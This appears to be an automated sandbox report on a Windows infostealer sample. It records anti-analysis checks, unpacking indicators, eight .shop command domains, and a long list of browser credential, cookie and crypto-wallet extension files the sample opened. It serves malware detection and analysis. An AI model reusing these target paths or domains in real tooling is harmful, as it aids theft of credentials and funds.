            Source: rdFy6abQ61.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rdFy6abQ61.exe, 00000000.00000003.1685915569.0000000002E65000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1698922197.0000000002E47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rdFy6abQ61.exeReversingLabs: Detection: 39%
            Source: rdFy6abQ61.exeVirustotal: Detection: 48%
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile read: C:\Users\user\Desktop\rdFy6abQ61.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rdFy6abQ61.exe "C:\Users\user\Desktop\rdFy6abQ61.exe"
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1856
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

            Data Obfuscation

            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Unpacked PE file: 0.2.rdFy6abQ61.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Unpacked PE file: 0.2.rdFy6abQ61.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_004499A1 push esp; ret | 0_2_004499A2
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_0044AAD0 push ecx; retn 0041h | 0_2_0044AAD5
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_005E30C7 push 0F56897Eh; iretd | 0_2_005E30DF
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_005E2361 push 00000004h; ret | 0_2_005E2375
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_005E646F push ebp; ret | 0_2_005E6470
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_005E3CDA push esi; retn 001Ch | 0_2_005E3CDE
            Source: rdFy6abQ61.exe | Static PE information: section name: .text entropy: 7.828452580141766
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe TID: 5900 | Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Amcache.hve.3.dr | Binary or memory string: VMware
            Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.3.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.3.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.3.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.000000000066A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: Amcache.hve.3.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW,
            Source: Amcache.hve.3.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.3.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.3.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.sys
            Source: Amcache.hve.3.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.3.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.3.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.3.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.3.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.3.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.3.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.3.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.3.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | API call chain: ExitProcess graph end node | graph_0-24908
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_00442080 LdrInitializeThunk, | 0_2_00442080
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_005E0083 push dword ptr fs:[00000030h] | 0_2_005E0083
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_020E092B mov eax, dword ptr fs:[00000030h] | 0_2_020E092B
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_020E0D90 mov eax, dword ptr fs:[00000030h] | 0_2_020E0D90

            HIPS / PFW / Operating System Protection Evasion

            Source: rdFy6abQ61.exe | String found in binary or memory: cloudewahsj.shop
            Source: rdFy6abQ61.exe | String found in binary or memory: rabidcowse.shop
            Source: rdFy6abQ61.exe | String found in binary or memory: noisycuttej.shop
            Source: rdFy6abQ61.exe | String found in binary or memory: tirepublicerj.shop
            Source: rdFy6abQ61.exe | String found in binary or memory: framekgirus.shop
            Source: rdFy6abQ61.exe | String found in binary or memory: wholersorie.shop
            Source: rdFy6abQ61.exe | String found in binary or memory: abruptyopsn.shop
            Source: rdFy6abQ61.exe | String found in binary or memory: nearycrepso.shop
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.3.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.3.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.3.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.3.dr | Binary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: Process Memory Space: rdFy6abQ61.exe PID: 3916, type: MEMORYSTR
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\ElectronCash\wallets
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/JAXX New Version
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: rdFy6abQ61.exe, 00000000.00000003.1714698948.0000000002E46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3s=:
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
